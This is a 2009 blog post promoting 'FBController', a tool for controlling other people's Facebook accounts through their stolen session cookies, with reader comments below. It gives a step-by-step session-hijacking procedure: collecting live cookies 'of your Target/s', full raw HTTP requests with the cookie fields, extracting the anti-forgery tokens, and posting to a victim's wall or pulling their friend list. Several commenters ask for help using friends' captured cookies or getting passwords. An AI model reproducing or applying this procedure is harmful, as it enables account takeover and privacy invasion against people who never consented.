FBConTroller [ FACEBOOK CONTROLLER ] - The Ultimate Facebook Controller (without the Password)
Thursday, 30. April 2009, 20:05:27
Let me clear that this utility WON'T hack/crack Facebook accounts !
The utility will need biscuits/cookies instead of the password.
Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.
1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.
2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].
Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.
Calculating &oldest= :
Deduct 144556 from Original Timestamp.
Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request
Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request
Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request
Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.
4 ] Send a GET Request like below with the above calculated variables :
5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
6 ] Generate a new POST Request with the above calculated new variables :
7 ] Use the above variables to view any content with the appropriate GET / requests
8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER) written
by me. You can also call it FACEBOOKIE, FACEHOOKER (since it hooks in someone else's cookies) ,FACEBHOOT or FACEBHOOK
Till now FBController version 1.0 uses your Target's provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List
More more features to come in version 2.0
A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.
Happy Controlling ! :-)
The utility will need biscuits/cookies instead of the password.
Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.
1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.
2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
GET /home.php? HTTP/1.1 Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].
Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.
Calculating &oldest= :
Deduct 144556 from Original Timestamp.
Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request
Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request
Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request
Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.
4 ] Send a GET Request like below with the above calculated variables :
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1 Accept: */* Accept-Language: en-US XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX x-svn-rev: 161013 UA-CPU: x86 XXXXXXXXXXXXXXX: XXXXXXXXXXXXX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: www.facebook.com Connection: Keep-Alive Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
6 ] Generate a new POST Request with the above calculated new variables :
POST /updatestatus.php HTTP/1.1 Accept: */* Accept-Language: en-US XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX x-svn-rev: 161013 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 XXXXXXXXXXXXXXX: XXXXXXXXXXXXX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: www.facebook.com Content-Length: 343 Connection: Keep-Alive Cache-Control: no-cache Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375
7 ] Use the above variables to view any content with the appropriate GET / requests
8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER) written
by me. You can also call it FACEBOOKIE, FACEHOOKER (since it hooks in someone else's cookies) ,FACEBHOOT or FACEBHOOK
Till now FBController version 1.0 uses your Target's provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List
More more features to come in version 2.0
A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.
Happy Controlling ! :-)
WIDGETIZE
quakerdoomer # 1. May 2009, 04:26
Threafire says that FBController "**STEALS**" Biscuits !
Also, Threatfire thinks malware distributors have now started distributing malwares via mailing lists. ROFL !
Its very disappointing to read such a careless irresponsible post from something like Threatfire !
I wouldn't be surprised if they develop a signature to thwart FBController from being transferred on the wire !
quakerdoomer # 3. May 2009, 05:26
Threatfire Blog (maybe after reading the above comment) quietly changed their statement
From:
"Another technique and tool has just been posted to steal biscuits, much like the Koobface worm, and it supports changing a wall without the password. The author claims to have just completed "FBController - The Ultimate Utility to Control Facebook accounts without the Password". "
To:
"Another technique and tool has just been posted to abuse stolen biscuits, much like the Koobface worm, and it supports changing a wall without the password." "
Good Boy
Anonymous # 8. May 2009, 23:49
I tried this with my own cookie info.
I also tried this with a friend's captured cookie data.
I always get a "Incorrect Cookie or Cookie Expired" error.
Below is the server's response.
HTTP/1.1 301 Moved Permanently
Date: Fri, 08 May 2009 23:44:22 GMT
Server: Apache/1.3.41.fb2
P3P: CP="HONK"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Edge-control: cache-maxage=10m
Location: http://static.ak.facebook.com/login.php
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
0
Any ideas??
quakerdoomer # 9. May 2009, 15:41
Did you get the Message "Logged in as:" ?
Check if you were able to pull down any of the following :
The Target's Home(First)Page, IntentPage, Ajax Chat Page, Profile Page.
Check if these html files got created in the FBConTroller folder.
quakerdoomer # 9. May 2009, 19:01
Anonymous # 19. May 2009, 00:13
im still confusing how to using this tools..when i open this tools there is comand prompt appear in desktop so i read all and there is message that told me to "press any key to continue" and i did what it said,but nothing happened and the command prompt dissapear with nothing change,im try again with open my FB acc and do the same right thing but nothing happened too...could u tell me how to using this tools.may step by step..im sorry thanks alot
Anonymous # 25. May 2009, 16:10
FBConTroller version 2.0
Anonymous # 28. May 2009, 19:08
can you provide a step by step guide to us that dont know html that well?
quakerdoomer # 31. May 2009, 18:12
Anonymous # 2. June 2009, 22:25
I cant seem to find the XS var. ? Is it still there?
quakerdoomer # 3. June 2009, 17:32
P.S. Version 2 will eliminate the need to type/paste in individual variables.
Anonymous # 29. June 2009, 13:59
can u tell me how to use that tool step by step?
because, i have tried but that didn't work
thanx doomer ^_^
Anonymous # 5. July 2009, 20:42
I am in the same position as the previous person. It would be highly appreciated if you can create a Step by step guide on how to use this Program. Thank You!
Anonymous # 10. July 2009, 17:24
Hi Azim,
I tried to understand but I have a problem: where can I find the "53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES"?
Thanks a lot
Anonymous # 16. July 2009, 04:13
how do I use the FBcontroller program?
Anonymous # 26. July 2009, 07:40
Great Job! I couldn't use it though because i couldn't find all the cookies required, xs, c_user and h_user. however, as far as I have read the power of FBController is very limited. I hope that you would release a more powerful version soon. one more thing, it would be great if you release a GUI version too. Because most people are not familiar with coding.
Anonymous # 26. July 2009, 07:59
Is there anyway to actually do anything with this?
I entered using my cookies and some friends' as well but was unable to do anything with it. maybe, can you help with loggin in to facebook with those cookies?
Anonymous # 3. August 2009, 16:44
hello
if i got the cookie what i should do??where the function fbcontroller??
thnx
Anonymous # 3. August 2009, 16:45
hello
if i got the cookie what i should do??where the function fbcontroller??
thnx
Anonymous # 25. October 2009, 16:33
Hi there,
Is it possible to set cookie parameters manually in browser? If yes which parameters should I consider adding? I usually use Firefox add-ons to edit cookie and set it to what I want. I just don't know how should I do it with fb cookies.
Anonymous # 17. November 2009, 09:12
hello
i have a question
if i have an account username can i get the it's password
or how i can get it
thanks
Anonymous # 25. November 2009, 20:37
kacook banyak nian tegawe apo>..?????